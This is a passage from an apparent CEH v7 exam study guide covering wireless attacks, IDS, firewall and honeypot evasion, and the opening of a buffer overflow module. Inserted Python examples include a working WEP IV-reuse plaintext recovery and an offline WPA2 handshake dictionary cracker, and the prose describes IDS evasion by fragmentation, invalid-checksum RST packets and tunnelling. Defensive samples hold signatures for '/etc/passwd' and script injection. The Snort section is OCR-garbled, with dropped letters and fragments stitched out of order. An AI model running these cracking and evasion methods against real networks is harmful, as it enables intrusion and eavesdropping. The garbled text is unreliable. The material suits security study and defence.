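def wep_encrypt(iv: bytes, wep_key: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 3-byte IV in the clear, then RC4(IV || key) applied
    to the payload. Two frames with the same IV therefore share a keystream."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + wep_key, plaintext)


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    return rc4(frame[:3] + wep_key, frame[3:])


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Given two frames under one IV and the plaintext of the first (e.g. a
    predictable ARP or DHCP packet), recover the plaintext of the second:
    C_a XOR C_b XOR P_a = P_b, for as many bytes as the known text covers."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs, different keystreams: nothing to cancel")
    ca, cb = frame_a[3:], frame_b[3:]
    n = min(len(ca), len(cb), len(known_plaintext_a))
    return bytes(ca[i] ^ cb[i] ^ known_plaintext_a[i] for i in range(n))


def iv_reuse_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least two of `frames` randomly
    chosen IVs collide. Computed in log space to avoid underflow."""
    space = 2 ** iv_bits
    log_no_collision = sum(math.log1p(-k / space) for k in range(frames))
    return 1.0 - math.exp(log_no_collision)


# Constructed demo values (not from the original page): a 40-bit WEP key, one IV
# used twice, a predictable frame and a frame the attacker wants to read.
WEP_KEY = bytes.fromhex("0102030405")
REUSED_IV = bytes.fromhex("0a0b0c")
KNOWN_FRAME = b"ARP who-has 10.0.0.1 tell 10.0.0.2"
SECRET_FRAME = b"GET /login?user=ben&pw=hunter2"

if __name__ == "__main__":
    fa = wep_encrypt(REUSED_IV, WEP_KEY, KNOWN_FRAME)
    fb = wep_encrypt(REUSED_IV, WEP_KEY, SECRET_FRAME)
    print("recovered:", recover_from_iv_reuse(fa, fb, KNOWN_FRAME))
    for n in (1000, 5000, 10000):
        print(f"{n:6d} frames -> P(IV reuse) = {iv_reuse_probability(n):.3f}")
```

The probability function assumes random IVs; many real WEP cards used a counter, which avoids random collisions but makes the IV sequence predictable and lets an attacker (via aireplay-ng) replay frames to force traffic instead.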


Rogue Access Points
Any access point set up to look like a legitimate member of the network, but used by a hacker to accomplish any of the attacks above.
Evil Twin Attack
Evil twin is a term for a rogue Wi-Fi access point that appears to be a legitimate hotspot offered on the premises, but has actually been set up by a hacker to eavesdrop on wireless communications among Internet surfers.
An evil twin attack is the wireless version of the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider.
Wardriving
Wardriving refers to driving around with a mobile Wi-Fi device looking for Wi-Fi signals. Cars driving around an area are common enough that they blend into the surroundings. Any method of travel can become a "war" vehicle.
Warflying involves the use of a private, or in some cases a remote-controlled, aircraft with a Wi-Fi antenna mounted to it for the purpose of finding Wi-Fi signals.
Warwalking can be used in a small enough area, like a college campus.
Warchalking is a method of documenting Wi-Fi networks in public places. These marks often resemble graffiti.
Finding a Wi-Fi signal can be aided by using different antennas. Omnidirectional antennas are common; they pick up signal from all around them. A directional antenna such as a Yagi only works in one direction, but is designed to have a much greater range in that direction than an omnidirectional antenna would.


Wireless Hacking Methodology
Wi-Fi discovery can be passive, by monitoring for traffic, or active, by sending probes out and collecting the responses. Using passive methods allows you to stay hidden longer. Using active techniques increases the chance of your attacks being discovered; however, active techniques will usually generate the needed information faster.
GPS mapping is not necessary for every job. Tools such as NetStumbler or WiGLE allow for automatic capturing of GPS data in the log.
Wireless traffic analysis involves gathering information such as SSIDs and encryption methods to determine appropriate strategies for attacks. Some tools, such as the aircrack-ng suite, will automatically provide this data while monitoring.
Launch a wireless attack after determining the appropriate methods. Depending on the network, you may have to crack the Wi-Fi encryption before this, or you may be able to access information without this step.
Wireless Hacking Tools
Tool Recommendation: aircrack-ng is the most used Wi-Fi tool of our practice. YouTube videos and Google searches will turn up an amazing amount of information on how to run it and what is needed to use aircrack-ng.
Bluetooth Hacking
Bluetooth hacking takes advantage of flaws in the Bluetooth stack in order to compromise Bluetooth-enabled devices. All Bluetooth hacking requires close proximity to the device in question because of its range limits.
Terms of Bluetooth Hacking
Bluesmacking is a DoS attack caused by oversized or malformed packets (L2CAP echo requests) being sent to the device.
Bluesnarfing is the theft of information from a Bluetooth device.
Bluejacking refers to sending unsolicited messages over Bluetooth to other Bluetooth devices. This is done anonymously through the OBEX protocol.


Defending Against Bluetooth Hacking
If you keep Bluetooth disabled until you need it, you minimize the window of opportunity for a hacker to compromise your device. When not pairing, keeping your device in non-discoverable mode is the best method of ensuring that the device does not broadcast information about itself. Lastly, encrypt data on the mobile device as a defense-in-depth measure should your device be compromised.
Defending Against Wireless Attacks
Always assume that your wireless signal will be available outside of your intended work area. Wireless signals handle network traffic just like a hub: the traffic is broadcast to anyone in range with the right equipment. Special antennas can pick up a signal from much further away than standard workspace equipment. Hiding your SSID broadcast and positioning your antennas can only do so much to limit your risk. These hiding techniques remove you from the low-hanging fruit category that hackers look for.
By ensuring that your wireless network is encrypted, and that your authentication is implemented correctly, you can keep your traffic confidential. Make sure that your wireless network is only being used by the devices and users that need to use it. If a client can be wired, it is afforded a greater level of security.
As with any other network, be sure that your equipment does not use default passwords. Physical access to network equipment can be used to bypass many network security controls. Periodic sweeps looking for rogue access points that may have been plugged into your wired network will avoid this problem.
Wi-Fi Security Tools
Aircrack-ng Suite: An all-in-one set of tools easily found in BackTrack. Our practice uses this tool as a beginning-to-end tool. It allows for sniffing of traffic, packet capture, MAC address capture, and SSID and encryption method capture. After getting the information you need, aircrack-ng provides tools for breaking encryption keys and using the recovered keys for replay attacks.
Kismet
Kismet is a layer 2 wireless sniffer that works with most common wireless network cards. Kismet identifies networks by passively collecting packets, detecting standard named networks, detecting hidden networks, and inferring the presence of non-beaconing networks via data traffic.

Netstumbler
NetStumbler is a tool that sniffs Wi-Fi signals and informs users whether their wireless network is properly configured. This tool can be set to play an audio tone when it finds networks, which is great for wardriving.

Wireless Pen Testing Framework
The penetration test of a wireless network component begins with documenting what security is currently in place. After documenting the current state, the next step is to discover what vulnerabilities are available to exploit. Once a wireless device is discovered, an auditor will determine what security is being used, such as WEP or WPA encryption.
If the wireless network is using up-to-date encryption methods, and they are implemented in a secure manner, the auditor can then determine whether the target would require an infeasible amount of time to brute force an opening. Once this is determined and documented, the report can be created with the findings.
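The "infeasible amount of time to brute force" judgement above, and the Breaking WPA passage earlier, both rest on how WPA-PSK turns a passphrase into the PMK and how a captured handshake lets each guess be checked offline. The block below is an added example (not from the study guide) that implements that chain: PBKDF2 to the PMK, the 802.11i PRF-512 to the PTK, and the WPA2 EAPOL MIC check that tells the cracker a guess was right. Because no real capture is available, simulate_capture builds the MIC the way a client would; the SSID, passphrase, MAC addresses, nonces and EAPOL bytes are all constructed for the demo.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


def wpa_psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).
    The SSID is the salt, which is why precomputed tables are per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 expands the PMK into the PTK. Every other input
    (both MAC addresses, both nonces) is sent in the clear in the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol_msg2: bytes   # message 2 of the four-way handshake, MIC field zeroed
    mic: bytes          # the MIC the client actually sent


def crack(hs: Handshake, wordlist) -> Optional[str]:
    """Offline dictionary attack: for each guess derive PMK -> PTK -> KCK and
    check whether it reproduces the captured MIC. No further traffic needed."""
    for guess in wordlist:
        pmk = wpa_psk_to_pmk(guess, hs.ssid)
        kck = prf512(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol_msg2), hs.mic):
            return guess
    return None


def simulate_capture(passphrase: str, ssid: str) -> Handshake:
    """Constructed stand-in for an airodump-ng capture: computes the MIC the
    way a real client would so there is something to attack. The MACs,
    nonces and EAPOL header bytes are fixed dummy values."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    eapol_msg2 = bytes.fromhex("0103007502010a00") + b"\x00" * 24
    pmk = wpa_psk_to_pmk(passphrase, ssid)
    kck = prf512(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2,
                     eapol_mic(kck, eapol_msg2))


# Constructed demo values (not from the original page).
TARGET_SSID = "HackerU-Guest"
CAPTURED = simulate_capture("Summer2011!", TARGET_SSID)
WORDLIST = ["password", "letmein", "wireless", "hackeru2011", "Summer2011!", "qwerty123"]

if __name__ == "__main__":
    print("recovered passphrase:", crack(CAPTURED, WORDLIST))
```

The 4096 PBKDF2 iterations are the only thing standing between the auditor and the passphrase, so the feasibility estimate in the report is simply guesses-per-second on the available hardware against the size of the passphrase space the policy allows; a long random passphrase keeps that infeasible, a dictionary word does not.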

Module 16 Evading IDS, Firewalls and Honeypots
Objectives:
. Intrusion Detection Systems (IDS)
. Ways to Detect an Intrusion
. Types of Intrusion Detection Systems
. Firewalls
. Types of Firewalls
. Firewall Identification Techniques
. Honeypots
. Types of Honeypots
. Evading IDS
. Evading Firewalls
. Countermeasures
. Firewall and IDS Penetration Testing

Intrusion Detection Systems (IDS)
An intrusion detection system analyzes data from a network and compares that data against rules that have been configured. If the data does not match what the system expects, it can raise an alarm. To analyze data an IDS has to be set to capture packets. To raise an alarm it has to be configured with rules that trigger this response.
Ways to Detect an Intrusion
Signature Recognition
Captured data is compared to signatures of possible attacks. This is also called misuse detection.
Anomaly Detection
This IDS relies on having a baseline of what normal network traffic looks like; once this is determined, anything outside of that norm is an anomaly.
Protocol Anomaly Detection
Instead of a baseline of network traffic, the expected behavior of protocols is used as the base. Anything outside of this expected behavior is considered an anomaly.
Types of IDS
Network Based
A device placed on the network in promiscuous mode to listen for traffic and dynamically inspect network packets for suspicious and anomalous activity.
Host Based
A host-based IDS monitors all or part of the dynamic behavior and state of a computer system. Think of a HIDS as an agent that monitors whether anything or anyone, internal or external, has circumvented the system's security policy.
Log File Monitoring
These systems collect log data and comb through it to reveal events after they occur.

Description: http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo .jpg Description: http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg Intrusion Detection Tool: Snort Snort is an open source networ tool capable of firewall type pac et filtering, protocol analysis, and rules based logging. Snort is used for a variety of networ tas s. The CEH exam expects students to be familiar with Snort logs and functions, but not necessarily exact commands.

File Integrity chec ing

Any of these ID systems may be wrapped into another piece of equipment such as a firewall or networ gateway. Indications of Intrusions 1. 2. 3. 4. 5. New files that are unfamiliar Repeated probes of machines and services Connections from unusual locations Gaps in system log file accounting System crashes or reboots

Unfortunately, these indications can also be signs of user activity and accident s. Firewalls A firewall is a pac et filter between networ s. Commonly they are used to eep i nternet traffic on one side of the wall and internal traffic on the other side. Firewalls may filter tr affic based on port, source or destination address, or type of traffic. Firewall Architecture Bastion Host A bastion host is a special purpose computer on a networ specifically designed and configured to withstand attac s. It is configured to have a public interface connected to the Internet and a private one connected to the internal networ . A bastion host is a computer that is fully exposed to attac . The system is on t he public side of the demilitarized zone (DMZ), unprotected by a firewall or filtering router. Frequen tly the roles of these systems are critical to the networ security system.

Compares files against a record of what the file is supposed to loo itor if files have been changed by intruders.

li e to mon
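Since the exam expects familiarity with Snort logs, here is an added example (not from this study guide and not code from the Snort project) that parses the one-line "fast" alert format Snort writes and summarises the alerts by source host. The alert lines are constructed for the example: the rule IDs use the 1000000+ range reserved for local rules, the messages are made up, and the addresses are documentation ranges.

```python
"""Parse Snort 'fast' alert lines and summarise them by source host."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample alerts (not captured from a real sensor). The sids are in
# the 1000000+ range reserved for local rules; addresses are documentation ranges.
SAMPLE_ALERTS = """\
03/14-09:21:07.118243  [**] [1:1000001:1] LOCAL ICMP echo from outside [**] [Classification: Misc activity] [Priority: 3] {ICMP} 203.0.113.9 -> 192.0.2.10
03/14-09:21:09.502811  [**] [1:1000002:2] LOCAL web server answered with uid=0 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.0.2.10:80 -> 203.0.113.9:51544
03/14-09:21:12.007000  [**] [1:1000003:1] LOCAL probe of telnet port [**] [Priority: 3] {TCP} 203.0.113.9:40322 -> 192.0.2.10:23
this line is not an alert and is skipped by the parser
"""

# One fast-format line: timestamp, [**] [gid:sid:rev] message [**],
# optional classification, priority, {protocol} src -> dst
ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>[A-Z0-9]+)\}\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)$"
)


@dataclass
class Alert:
    timestamp: str
    gid: int
    sid: int
    rev: int
    msg: str
    classification: Optional[str]
    priority: int          # Snort: 1 is the most severe
    proto: str
    src_ip: str
    src_port: Optional[int]
    dst_ip: str
    dst_port: Optional[int]


def _split_endpoint(endpoint: str):
    """TCP/UDP endpoints are written host:port; ICMP has no port. IPv4 only."""
    host, sep, port = endpoint.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return endpoint, None


def parse_alert(line: str) -> Optional[Alert]:
    """Return an Alert for a fast-format line, or None for anything else."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    src_ip, src_port = _split_endpoint(m.group("src"))
    dst_ip, dst_port = _split_endpoint(m.group("dst"))
    return Alert(m.group("ts"), int(m.group("gid")), int(m.group("sid")), int(m.group("rev")),
                 m.group("msg"), m.group("cls"), int(m.group("prio")), m.group("proto"),
                 src_ip, src_port, dst_ip, dst_port)


def parse_log(text: str) -> List[Alert]:
    return [a for a in (parse_alert(line) for line in text.splitlines()) if a is not None]


def summarize(alerts: List[Alert]) -> Dict[str, object]:
    """Alert count per source host plus the sids of priority 1 and 2 alerts."""
    by_src = Counter(a.src_ip for a in alerts)
    high = [a.sid for a in alerts if a.priority <= 2]
    return {"total": len(alerts), "by_src": dict(by_src), "high_priority_sids": high}


if __name__ == "__main__":
    for alert in parse_log(SAMPLE_ALERTS):
        print(alert)
    print(summarize(parse_log(SAMPLE_ALERTS)))
```

Grouping by source host is the first thing to do with a pile of alerts: the constructed data shows one outside host responsible for two of the three events, and the single priority 2 alert is the server answering, which is the one a defender should read first.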

There are two common network configurations that include bastion hosts and their placement. The first requires two firewalls, with bastion hosts sitting between the first "outside world" firewall and an inside firewall, in a demilitarized zone (DMZ). Often smaller networks do not have multiple firewalls, so if only one firewall exists in a network, bastion hosts are commonly placed outside the firewall.

Screened Subnet
A screened subnet firewall can be used to separate components of the firewall onto separate systems, for speed and organizational purposes. This requires at least three interfaces: public, private, and mixed. As each component system of the screened subnet firewall needs to implement only a specific task, each system is less complex to configure. A screened subnet firewall is often used to establish a demilitarized zone (DMZ). The DMZ houses resources that are available to the public, such as web servers. This allows the private systems to be kept behind a separate network interface.

Multi-homed Firewall
Multi-homed equipment allows for more zone creation to keep sections of the internal network from connecting, or for allowing the DMZ to be more specifically divided up.

Types of Firewalls
Firewalls are categorized by the level of the OSI model at which they operate.

Packet Filtering Firewall
These firewalls work at the network level. Typically, they are paired with a network router to compare packets with criteria and then discard or route the packet in question depending on the criteria it matches. These may allow for further rule customization such as addresses, ports, or protocols involved.

Circuit Level Gateway Firewall
This type of firewall operates at the Session Level of the OSI model. These gateways monitor traffic for TCP handshake information and determine whether or not the session is allowed. They do not filter individual packets.

Application Level Firewall
These firewalls operate at the Application layer of the OSI model. Only allowed applications are able to pass traffic through this system. The high level filtering allows for application specific filtering.

Stateful Multilayer Inspection Firewall
This is a combination of firewall types that filters at the levels of all of the above firewall types.

Firewall Identification Techniques
Firewalls can be identified by how they act. All firewalls involve using a set of rules, rules create patterns, and patterns can be exploited by hackers. Some firewalls have a signature of what ports they listen on; these are revealed by port scanning. Firewalking is a method of using the Time to Live of TCP or UDP packets to determine if a target allows traffic through to a hop on the other side. Which packets are forwarded and give a "TTL exceeded in transit" message informs a hacker what packets are being passed onto the network. Banner grabbing using FTP, Telnet, SMTP or HTTP ports is another method of identifying services, if the banner has been left as a default.

Honeypots
Honeypots are systems that are configured to look like production systems to attract possible intruders. Any activity on this otherwise unused system would be a sign of a hacker taking a look around. However, as a hacker, when you encounter a system that appears to be open to everything you want to access, you are probably in a Honeypot and therefore will leave it alone.

Types of Honeypots
Honeypots can be classified based on their deployment and based on their level of involvement. Based on the deployment, honeypots may be classified as:

Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations. Production honeypots are placed inside the production network with other production servers by an organization to improve their overall state of security.

Research honeypots are run by a volunteer, non-profit research organization or an educational institution to gather information about the motives and tactics of the cracker community targeting different networks. Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations.

Based on the design criteria, honeypots can be classified into three categories:
1. pure honeypots
2. high interaction honeypots
3. low interaction honeypots

Pure honeypot is a full production system. The activities of the attacker are monitored using a casual tap installed on the honeypot's link to the network.

High interaction honeypots imitate the activities of the real systems that host a wide variety of services and, therefore, an attacker may be allowed a lot of services to waste his/her time. If virtual machines are not available, each honeypot needs to be maintained on a separate physical computer, which can be very expensive.

Low interaction honeypots are based on the services that the attacker normally requests. There are many positives with the requirement of only a few services by the attackers, which means low overhead and simple configuration. Example: Honeyd.

Honeytokens are honeypots that are not computer systems. Their value lies not in their use, but in their abuse. Honeytokens can exist in almost any form, from a fake account to a database entry that would only be selected by malicious queries, making the concept ideally suited to ensuring data integrity: any use of them is inherently suspicious if not necessarily malicious. In general, they don't necessarily prevent any tampering with the data, but instead give the administrator a further measure of confidence in the data integrity.
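The database-entry honeytoken described above, as an added Python example that is not part of the study guide: a canary account is planted among real users, and the check runs on every result set, so a query that pulls the whole table (an export that was not scoped, an injected tautology, a dump by a stolen credential) returns the canary and raises an alert while a normal single-user lookup does not. The user names, e-mail addresses and the honeytoken values are constructed for the example, and it assumes no legitimate code path ever looks the canary up.

```python
"""A honeytoken row in a user table: legitimate code never asks for it, so any
query that returns it is a signal worth alerting on."""
import sqlite3
from typing import List, Tuple

# Constructed canary account (assumption: no real process ever looks it up).
HONEYTOKEN = {"username": "svc_backup_ro", "email": "svc-backup-ro@example.invalid"}


def build_db() -> sqlite3.Connection:
    """In-memory table with two real users and one honeytoken row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, pw_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, pw_hash) VALUES (?, ?, ?)",
        [
            ("alice", "alice@example.invalid", "<hash-alice>"),
            ("bob", "bob@example.invalid", "<hash-bob>"),
            (HONEYTOKEN["username"], HONEYTOKEN["email"], "<hash-canary>"),  # the honeytoken
        ],
    )
    conn.commit()
    return conn


def run_query(conn: sqlite3.Connection, sql: str, params: tuple = ()) -> Tuple[List[tuple], List[str]]:
    """Execute a query and return (rows, alerts).

    The check runs on the result set rather than on the SQL text, so it catches
    any query shape (a wildcard dump, an injected tautology, a mis-scoped export)
    that pulls the canary out along with real data.
    """
    rows = conn.execute(sql, params).fetchall()
    alerts = []
    for row in rows:
        if HONEYTOKEN["username"] in row or HONEYTOKEN["email"] in row:
            alerts.append(f"honeytoken {HONEYTOKEN['username']!r} returned by query: {sql}")
    return rows, alerts


def demo() -> Tuple[int, int, int]:
    """Returns (alerts from a normal lookup, alerts from a full dump, rows in the dump)."""
    conn = build_db()
    _, normal_alerts = run_query(
        conn, "SELECT username, email FROM users WHERE username = ?", ("alice",)
    )
    dump_rows, dump_alerts = run_query(conn, "SELECT username, email FROM users")
    return len(normal_alerts), len(dump_alerts), len(dump_rows)


if __name__ == "__main__":
    print(demo())
```

In a real deployment the alert would go to the SIEM rather than a list, and the canary values would be unique enough to be searched for elsewhere (paste sites, credential dumps), which is the other half of a honeytoken's value.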

Evading Intrusion Detection Systems
IDSs are susceptible to multiple evasion techniques and are even capable of being used to attack a target. By creating a Denial of Service a hacker can consume resources of the IDS to the point that it is unable to log an actual attack. DoS may also be used to bring the IDS offline, allowing the network to be unprotected during the intended attack.

Because an IDS uses specific rules to identify attacks, any method used to encode or hide the attack may be successful, such as encoding in Unicode or using encrypted channels. If the rules require an exact match of data, causing the data to look different will not set off an alarm.

Fragmentation attacks take advantage of a configuration in reassembly where the victim has a longer timeout for fragments than the IDS does. The IDS is unable to assemble the fragmented attack in the window of time allowed by its rule, and so passes on the packets, but the victim has longer to reassemble and does so.

Invalid RST packets may be used to trick an IDS into believing a session has ended, but keep a communication alive. TCP uses checksums to ensure communication is reliable; if this checksum is wrong the packet is thrown out. When an IDS sees the RST packet with an invalid checksum it does not discard it and assumes the session is over. The victim does see the checksum as invalid and discards the RST packet, keeping the communication going.

Application layer attacks depend upon an IDS being unable to inspect compressed file formats used for images or video packets.

Any flood of data can be used to bury an attack within a wall of log data that often goes unread or unanalyzed.
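The invalid-RST trick above comes down to one missing step in the IDS: verifying the TCP checksum before acting on the flag. This added Python example (not from the study guide) computes the checksum over the pseudo-header and segment as the receiving host does, then models both behaviours: a naive IDS that closes its session state on any RST, and a checksum-verifying one that, like the endpoint, ignores the bad segment. The segments and addresses are constructed in memory; nothing is sent on the wire.

```python
"""Validate the TCP checksum of a RST segment the way the receiving host does.

An IDS that tracks session state from RST flags without verifying the checksum
closes its view of the session while the endpoint, which discards the bad
segment, keeps talking. Constructed segments only; nothing is sent."""
import socket
import struct

TCP_PROTO = 6
FLAG_RST = 0x04
FLAG_ACK = 0x10


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 style 16-bit ones' complement sum with end-around carry."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip: bytes, dst_ip: bytes, tcp_len: int) -> bytes:
    """IPv4 pseudo-header: src, dst, zero, protocol, TCP length."""
    return src_ip + dst_ip + struct.pack("!BBH", 0, TCP_PROTO, tcp_len)


def tcp_checksum(src_ip: bytes, dst_ip: bytes, segment: bytes) -> int:
    """Checksum for a segment whose checksum field (bytes 16-17) is zero."""
    return (~ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment)) & 0xFFFF


def checksum_valid(src_ip: bytes, dst_ip: bytes, segment: bytes) -> bool:
    """Summing pseudo-header + segment, checksum included, must give 0xFFFF."""
    return ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0xFFFF


def build_segment(src_ip, dst_ip, sport, dport, seq, flags, checksum=None) -> bytes:
    """20-byte TCP header, no options; checksum computed unless one is forced."""
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 65535, 0, 0)
    if checksum is None:
        checksum = tcp_checksum(src_ip, dst_ip, header)
    return header[:16] + struct.pack("!H", checksum) + header[18:]


def is_rst(segment: bytes) -> bool:
    return bool(segment[13] & FLAG_RST)


def ids_sees_session_end(segment, src_ip, dst_ip, verify_checksum: bool) -> bool:
    """verify_checksum=False models the naive IDS; True models the endpoint."""
    if not is_rst(segment):
        return False
    return checksum_valid(src_ip, dst_ip, segment) if verify_checksum else True


# Constructed endpoints (documentation address ranges).
SRC = socket.inet_aton("203.0.113.9")
DST = socket.inet_aton("192.0.2.10")
GOOD_RST = build_segment(SRC, DST, 51544, 80, 1000, FLAG_RST)
GOOD_CHECKSUM = int.from_bytes(GOOD_RST[16:18], "big")
# Same segment with the checksum off by one: the endpoint drops it.
BAD_RST = build_segment(SRC, DST, 51544, 80, 1000, FLAG_RST, checksum=(GOOD_CHECKSUM + 1) & 0xFFFF)

if __name__ == "__main__":
    for name, seg in (("good RST", GOOD_RST), ("bad-checksum RST", BAD_RST)):
        print(name, "naive IDS closes:", ids_sees_session_end(seg, SRC, DST, False),
              "endpoint closes:", ids_sees_session_end(seg, SRC, DST, True))
```

The same verification belongs in the fragment reassembly path: the defensive rule is that the sensor must only act on segments the destination host would itself accept.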
Evading Firewalls
By spoofing an IP address that is trusted by the target firewall, a hacker can gain access just like the actual spoofed machine.

By asking for information in a method the firewall does not expect you can gain access to data the firewall would normally block. For example, if a firewall is configured to block HTTP access to www.facebook.com but you ping www.facebook.com to find that it is hosted at 69.171.228.39 and put that number in your web browser, the firewall does not see that as asking for the same information.

Creating a tunnel through accepted protocols can also bypass most firewall restrictions. ICMP, HTTP, and other standard communications can be used to create a tunnel that is then seen by the firewall as accepted communication.

Countermeasures
IDSs and firewalls live and die by their rules and signatures. Always keep the signatures and software up to date to avoid being victim to an already patched exploit or a signature that was available. Ensure that your settings allow the IDS to see fragmented data exactly as the end client will see it. Rules need to be set to account for the ability of information to be asked for and sent in multiple encoding methods.
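The last countermeasure, rules that account for multiple encodings, is usually implemented by normalising the data before the rule runs rather than by writing one rule per encoding. The added Python example below (not from the study guide) shows the difference: a literal signature that misses percent-encoded, double-encoded, %u-encoded, fullwidth-Unicode and HTML-entity forms of the same string hits all of them once the input is decoded in bounded rounds and case-folded. The signatures and request fragments are constructed for the example.

```python
"""Decode common encodings before matching signatures, so a rule written for
the literal string also fires on its encoded forms."""
import html
import re
import unicodedata
import urllib.parse
from typing import Dict, List, Tuple

# Constructed signatures: literal strings a rule author would write.
SIGNATURES = ("../", "<script", "/etc/passwd")

_PERCENT_U = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_once(s: str) -> str:
    """One pass of the decoders an HTTP server or browser would apply."""
    s = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), s)  # IIS-style %uXXXX
    s = urllib.parse.unquote(s)                                 # %XX, UTF-8 multibyte included
    s = html.unescape(s)                                        # &lt; &#46; &#x2e; ...
    return s


def normalize(s: str, max_rounds: int = 3) -> str:
    """Decode repeatedly (bounded, so double and triple encoding is peeled off
    without looping forever), fold Unicode compatibility forms such as
    fullwidth characters to ASCII, and lowercase."""
    for _ in range(max_rounds):
        decoded = decode_once(s)
        if decoded == s:
            break
        s = decoded
    return unicodedata.normalize("NFKC", s).lower()


def naive_match(data: str) -> List[str]:
    """What an exact-match rule sees: the bytes as they arrived."""
    return [sig for sig in SIGNATURES if sig in data]


def normalized_match(data: str) -> List[str]:
    """The same rule applied after normalisation."""
    return [sig for sig in SIGNATURES if sig in normalize(data)]


# Constructed request fragments illustrating the encodings the text mentions.
SAMPLES = {
    "plain":     "GET /index.html",
    "percent":   "GET /..%2f..%2fetc/passwd",
    "double":    "GET /%252e%252e%252fetc%252fpasswd",
    "unicode_u": "GET /%u002e%u002e%u002fetc/passwd",
    "fullwidth": "GET /\uff0e\uff0e\uff0fetc/passwd",
    "html_case": "q=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;",
}


def compare() -> Dict[str, Tuple[List[str], List[str]]]:
    """Per sample: (signatures the naive rule hits, signatures hit after normalising)."""
    return {name: (naive_match(s), normalized_match(s)) for name, s in SAMPLES.items()}


if __name__ == "__main__":
    for name, (raw, norm) in compare().items():
        print(f"{name:10s} naive={raw} normalized={norm}")
```

The bound on decoding rounds matters: an unbounded decoder is itself a resource-consumption target, which is the first evasion listed above.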

Firewall/IDS Penetration Testing
Testing of firewalls and Intrusion Detection Systems is a matter of finding whether the rules account for the methods that may be used to bypass their protection. If the rules keep out the attack, then the system is considered secure.


Module 17 Buffer Overflows Study Guide

Objectives:
Buffer Overflows
Stack-Based Buffer Overflow
Heap-Based Buffer Overflow
Stack Operation
Buffer Overflow Steps
Attacking a Real Program
Smashing the Stack
Identifying Buffer Overflows
BoF Detection Tools
Defense against Buffer Overflows
BoF Countermeasure Tools
BoF Pen Testing

Buffer Overflows
Programs utilize memory to work. They store information in allocated memory. These allocations are usually created to fit a certain number of bytes of data. When the information that is placed in memory is more bytes than the space that was allocated you have a buffer overflow or buffer overrun. This overwrites whatever comes next in the memory. If a critical piece of data is overwritten the program crashes. This can be as simple as a program expecting to receive a 10 digit phone number but a command like strcpy placing 11 bits in the memory space, crashing the program.

Stack Based Buffer Overflow
The stack or call stack is a section of memory used to keep track of subroutines in a computer program. The Stack Based Buffer Overflow attacks this structure to overwrite data or introduce commands to make the program function in ways the programmer did not intend.

Heap Based Buffer Overflow
The heap is an area in memory dynamically created when the program is run. This data is corrupted by a Heap Based Overflow to alter the structure of the heap to run malicious code.

Stack Operation

Shellcode
